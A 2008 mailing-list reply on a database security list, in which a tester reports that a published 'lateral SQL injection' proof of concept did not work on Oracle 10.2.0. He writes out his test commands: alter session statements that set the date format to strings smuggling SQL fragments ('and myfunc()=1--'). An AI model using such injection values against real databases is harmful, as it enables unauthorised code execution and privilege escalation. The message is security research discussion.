[dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- From: "Richard Slide" <richard.slide@xxxxxxxxx>
- To: dbsec@xxxxxxxxxxxxx
- Date: Sat, 19 Jul 2008 17:07:29 +0200
Hello,
I have tried your POC in Oracle 10.2.0 and it seems it doesn't work.
Have you tested it only in Oracle 11?
This is what I did.
I created on my db the user usertest1 with password usertest1,
then after that:
alter session set nls_date_format='"'' and myfunc()=1--"'; or
alter session set nls_date_format='"'' and 1=1--"';
select sysdate from dual;
SYSDATE
------------------
2008-07-19
Does this flaw work only in Oracle 11?
Cheers
Richard